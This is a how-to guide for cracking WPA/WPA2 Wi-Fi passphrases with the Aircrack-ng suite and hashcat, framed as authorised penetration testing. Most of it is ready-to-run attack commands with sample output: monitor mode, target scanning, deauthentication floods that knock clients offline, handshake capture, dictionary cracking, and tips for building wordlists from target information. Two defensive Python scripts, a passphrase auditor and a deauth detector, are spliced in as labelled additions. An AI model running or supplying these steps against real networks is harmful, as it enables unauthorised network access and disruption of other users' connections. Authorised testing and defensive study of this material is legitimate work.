Cracking WPA/WPA2 with Aircrack-ng on Kali Linux

This guide covers testing WPA/WPA2 network security using the Aircrack-ng suite on Kali Linux. We'll capture the four-way handshake and perform dictionary attacks to recover the pre-shared key.

Legal Disclaimer: Only perform these techniques on networks you own or have explicit written permission to test. Unauthorized access to computer networks is illegal and can result in criminal prosecution. This guide is for educational and authorized penetration testing purposes only.

How WPA/WPA2 Cracking Works

WPA/WPA2 does not share WEP's statistical weaknesses, so the key cannot be recovered simply by collecting traffic. The only practical attack against a pre-shared-key network is:

  1. Capture the four-way handshake between a client and access point
  2. Perform a dictionary attack: test each candidate passphrase from a wordlist against the captured handshake

The handshake occurs when a client connects to the network. If no clients are actively connecting, we can force a reconnection by sending deauthentication frames.

Key limitation: This attack only succeeds if the password exists in your wordlist.

Note: This technique does not work against WPA3, which uses Simultaneous Authentication of Equals (SAE) and is immune to offline dictionary attacks.

Prerequisites

Hardware Requirements

You need a wireless adapter that supports:

  • Monitor mode - Passive packet capture
  • Packet injection - Sending raw 802.11 frames

Recommended adapters:

  • Alfa AWUS036ACH (dual-band, 802.11ac)
  • Alfa AWUS036ACHM (dual-band, newer chipset)
  • Alfa AWUS1900 (high power, quad-antenna)
  • TP-Link TL-WN722N v1 (budget option, Atheros chipset)

Note: Many built-in laptop wireless cards don't support monitor mode or injection. Check the Aircrack-ng compatibility list for your chipset.

Software Requirements

Kali Linux comes with Aircrack-ng pre-installed. Verify with:

aircrack-ng --version

The suite includes 20+ tools. The ones we'll use:

Tool         Purpose
airmon-ng    Enable/disable monitor mode
airodump-ng  Capture wireless packets
aireplay-ng  Inject packets (deauthentication)
aircrack-ng  Crack captured handshakes

Wordlist

Kali includes the famous rockyou.txt wordlist:

# Decompress if needed
sudo gunzip /usr/share/wordlists/rockyou.txt.gz

# Check it exists
ls -lh /usr/share/wordlists/rockyou.txt

This contains ~14 million passwords (134MB uncompressed).
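As an added defender-side check (not from the original guide or the Aircrack-ng project): the attack described above only works when the PSK appears in the attacker's wordlist, so this script audits a proposed passphrase against a wordlist such as rockyou.txt before the network goes live. The normalize() rule, the 60-bit strength threshold and the inline sample wordlist are assumptions for this example.

```python
import math

# WPA/WPA2 pre-shared keys must be 8 to 63 printable ASCII characters.
MIN_LEN, MAX_LEN = 8, 63

def load_wordlist(path):
    """Stream candidates from a wordlist file such as /usr/share/wordlists/rockyou.txt."""
    with open(path, "r", encoding="latin-1") as fh:   # rockyou.txt is not clean UTF-8
        for line in fh:
            yield line.rstrip("\r\n")

def normalize(candidate):
    """Crude rule-style normalization (assumption): lowercase, strip trailing digits/symbols."""
    return candidate.lower().rstrip("0123456789!@#$%^&*.?_-")

def estimate_bits(passphrase):
    """Rough strength upper bound: length * log2(size of the character classes used)."""
    classes = 0
    if any(c.islower() for c in passphrase): classes += 26
    if any(c.isupper() for c in passphrase): classes += 26
    if any(c.isdigit() for c in passphrase): classes += 10
    if any(not c.isalnum() for c in passphrase): classes += 33
    return len(passphrase) * math.log2(classes) if classes else 0.0

def audit_passphrase(passphrase, candidates):
    """Check a proposed PSK against an iterable of wordlist candidates; return a verdict."""
    findings = []
    if not MIN_LEN <= len(passphrase) <= MAX_LEN:
        findings.append("length outside the WPA2 8-63 character range")
    wanted, variant_of = normalize(passphrase), None
    for cand in candidates:
        if cand == passphrase:               # plain dictionary attack would succeed
            findings.append("exact match in wordlist")
            break
        if variant_of is None and normalize(cand) == wanted:
            variant_of = cand                # rule-based attack (case/suffix) would succeed
    if variant_of is not None:
        findings.append(f"simple variant of wordlist entry {variant_of!r}")
    bits = estimate_bits(passphrase)
    if bits < 60:                            # threshold is an assumption for this example
        findings.append(f"estimated strength only {bits:.0f} bits")
    return {"passphrase_ok": not findings, "bits": round(bits, 1), "findings": findings}

# Constructed mini wordlist standing in for rockyou.txt in the runnable demo.
SAMPLE_WORDLIST = ["123456", "password", "supersecret", "iloveyou", "qwerty123"]

if __name__ == "__main__":
    for pw in ("password", "SuperSecret123", "correct horse battery staple 42"):
        print(pw, "->", audit_passphrase(pw, SAMPLE_WORDLIST))
```

Against the real file, call `audit_passphrase(pw, load_wordlist("/usr/share/wordlists/rockyou.txt"))`; the generator streams the 134MB file without loading it into memory.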

Step 1: Identify Your Wireless Interface

List your network interfaces:

iwconfig

Look for your wireless adapter (typically wlan0 or wlan1):

wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated
          ...

Note the interface name—we'll use wlan0 throughout this guide.

Step 2: Kill Interfering Processes

Network managers can interfere with monitor mode by changing channels or resetting the interface. Kill them first:

sudo airmon-ng check kill

This stops processes like:

  • NetworkManager
  • wpa_supplicant
  • dhclient

You'll see output like:

Killing these processes:

  PID Name
  723 wpa_supplicant
  812 NetworkManager

Note: Your regular network connection will stop working. To restore it later:

sudo systemctl start NetworkManager

Step 3: Enable Monitor Mode

Put your wireless adapter into monitor mode:

sudo airmon-ng start wlan0

Output:

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k_htc       Qualcomm Atheros AR9271

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

Your interface is now wlan0mon (monitor mode). Verify with:

iwconfig wlan0mon

You should see Mode:Monitor.

Step 4: Scan for Target Networks

Start scanning for nearby wireless networks:

sudo airodump-ng wlan0mon

You'll see a live display:

 CH  9 ][ Elapsed: 1 min ][ 2026-01-09 15:30

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 00:14:6C:7E:40:80  -67      234      1245   12   6   54e  WPA2 CCMP   PSK  HomeNetwork
 A0:B1:C2:D3:E4:F5  -72       89       456    3  11   54e  WPA2 CCMP   PSK  CoffeeShop

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2  -45    54e-54      0      892
 00:14:6C:7E:40:80  48:A9:1C:3D:2E:8F  -52    54e-54      0      234

Top section: Access points
Bottom section: Connected clients

Note down for your target:

  • BSSID: 00:14:6C:7E:40:80 (AP's MAC address)
  • CH: 6 (channel)
  • ESSID: HomeNetwork (network name)
  • Client MAC: 00:0F:B5:FD:FB:C2 (for targeted deauth)

Press Ctrl+C to stop scanning.

Step 5: Capture the Handshake

Focus on your target network and start capturing:

sudo airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w capture wlan0mon

Parameters:

  • -c 6 — Lock to channel 6
  • --bssid 00:14:6C:7E:40:80 — Filter by target AP
  • -w capture — Output file prefix
  • wlan0mon — Monitor interface

Leave this running in the terminal. It will create files like capture-01.cap.

Step 6: Force a Handshake (Deauthentication)

Open a new terminal and send deauthentication frames to force clients to reconnect:

Option A: Deauth All Clients (Broadcast)

sudo aireplay-ng -0 5 -a 00:14:6C:7E:40:80 wlan0mon

Option B: Deauth Specific Client (More Reliable)

sudo aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0mon

Parameters:

  • -0 5 — Deauthentication mode, send 5 packets
  • -a — Target AP's BSSID
  • -c — Target client's MAC (optional but more effective)

Output:

15:32:45  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 6
15:32:45  Sending 64 directed DeAuth (code 7). STMAC: [00:0F:B5:FD:FB:C2]
15:32:46  Sending 64 directed DeAuth (code 7). STMAC: [00:0F:B5:FD:FB:C2]
...
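A defender's counterpart to this step, added here and not part of the guide or the Aircrack-ng suite: a small wireless-IDS style check that raises an alert when one source sends a burst of deauthentication frames, the pattern the aireplay-ng output above produces (64 frames per second, reason code 7). The frame tuple layout, the 1-second window and the 10-frame threshold are assumptions for this example; the mitigation is Protected Management Frames (802.11w) on the AP, which makes clients reject forged deauth frames.

```python
from collections import defaultdict, deque

def detect_deauth_floods(frames, window=1.0, threshold=10):
    """Flag sources sending >= threshold deauth/disassoc frames within `window` seconds.

    frames: iterable of (timestamp, subtype, source_mac, dest_mac, reason_code).
    Returns one alert dict per burst, carrying the peak count seen in any window.
    """
    recent = defaultdict(deque)   # source MAC -> timestamps of its recent deauth frames
    active = {}                   # source MAC -> alert dict for the burst in progress
    alerts = []
    for ts, subtype, src, dst, reason in sorted(frames, key=lambda f: f[0]):
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:    # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            if src not in active:          # start of a new burst: raise exactly one alert
                active[src] = {"source": src, "target": dst, "reason": reason,
                               "first_seen": q[0], "count": 0}
                alerts.append(active[src])
            active[src]["count"] = max(active[src]["count"], len(q))
        else:
            active.pop(src, None)          # burst is over; a later one gets its own alert
    return alerts

AP, CLIENT = "00:14:6C:7E:40:80", "00:0F:B5:FD:FB:C2"   # addresses from the scan above

# Constructed sample frames (timestamp, subtype, src, dst, reason); not a real capture.
SAMPLE_FRAMES = [
    (1.0, "beacon", AP, "ff:ff:ff:ff:ff:ff", None),
    (2.5, "deauth", AP, "48:A9:1C:3D:2E:8F", 3),   # one ordinary deauth: station leaving
]
# Two bursts of 64 reason-code-7 frames, mirroring the two aireplay-ng lines above.
for start in (100.0, 130.0):
    SAMPLE_FRAMES += [(start + i * 0.003, "deauth", AP, CLIENT, 7) for i in range(64)]

if __name__ == "__main__":
    for a in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"{a['source']} -> {a['target']}: {a['count']} deauth frames "
              f"(reason {a['reason']}) starting at t={a['first_seen']:.3f}s")
```

A single deauth with reason 3 is normal client behaviour and is not flagged; only the bursts produce alerts.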

Verify Handshake Capture

Watch your airodump-ng window. When a handshake is captured, you'll see:

 CH  6 ][ Elapsed: 2 mins ][ 2026-01-09 15:34 ][ WPA handshake: 00:14:6C:7E:40:80

The WPA handshake: [BSSID] message confirms success. You can now stop airodump-ng with Ctrl+C.

Step 7: Crack the Password

Use aircrack-ng with your wordlist:

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 00:14:6C:7E:40:80 capture-01.cap

Parameters:

  • -w — Path to wordlist
  • -b — Target BSSID
  • Last argument — Capture file

Successful Output

                               Aircrack-ng 1.7

      [00:05:23] 1823741/14344392 keys tested (5765.32 k/s)

      Time left: 36 minutes, 12 seconds                      12.71%

                          KEY FOUND! [ SuperSecret123 ]

      Master Key     : A1 B2 C3 D4 E5 F6 77 88 99 AA BB CC DD EE FF 00
                       11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF 00

      Transient Key  : 12 34 56 78 9A BC DE F0 12 34 56 78 9A BC DE F0
                       ...

      EAPOL HMAC     : AB CD EF 01 23 45 67 89 AB CD EF 01 23 45 67 89

The password is SuperSecret123.

Failed Attempt

If the password isn't in your wordlist:

                               Aircrack-ng 1.7

      [00:42:17] 14344392/14344392 keys tested (5612.43 k/s)

      Time left: 0 seconds                                  100.00%

      KEY NOT FOUND

      Passphrase not in dictionary

Try a different or larger wordlist, or use hashcat for GPU-accelerated cracking.

Step 8: GPU-Accelerated Cracking with Hashcat

For faster cracking, convert the capture and use hashcat:

# Convert to hashcat format
hcxpcapngtool -o hash.hc22000 capture-01.cap

# Crack with hashcat (GPU-accelerated)
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

Performance comparison:

  • Aircrack-ng (CPU): ~5,000 keys/second
  • Hashcat (GPU): ~400,000+ keys/second

Step 9: Restore Normal Networking

When you're done, disable monitor mode and restore network services:

# Stop monitor mode
sudo airmon-ng stop wlan0mon

# Restart network manager
sudo systemctl start NetworkManager

Quick Reference

Step                         Command
Kill interfering processes   sudo airmon-ng check kill
Enable monitor mode          sudo airmon-ng start wlan0
Scan networks                sudo airodump-ng wlan0mon
Capture handshake            sudo airodump-ng -c [CH] --bssid [MAC] -w capture wlan0mon
Deauthenticate clients       sudo aireplay-ng -0 5 -a [AP_MAC] -c [CLIENT_MAC] wlan0mon
Crack password               sudo aircrack-ng -w wordlist.txt capture-01.cap
Disable monitor mode         sudo airmon-ng stop wlan0mon
Restore networking           sudo systemctl start NetworkManager

Troubleshooting

"No handshake captured"

  • Ensure clients are connected to the target network
  • Get physically closer to the AP and clients
  • Try deauthenticating specific clients instead of broadcast
  • Verify you're on the correct channel
  • Some clients may not reconnect automatically—be patient

"Interface doesn't support monitor mode"

  • Check if your adapter is compatible
  • Try updating drivers: sudo apt update && sudo apt upgrade
  • Consider purchasing a compatible USB adapter

"Passphrase not in dictionary"

  • Try larger wordlists
  • Use rule-based attacks with hashcat
  • Create custom wordlists based on target information

"Channel hopping" or unstable capture

  • Make sure you killed all interfering processes
  • Verify NetworkManager and wpa_supplicant are stopped
  • Lock to the target channel with -c

Additional Resources

For more advanced techniques:

# View all aircrack-ng tools
dpkg -L aircrack-ng | grep /usr/bin/

# Get help for any tool
airodump-ng --help
aireplay-ng --help
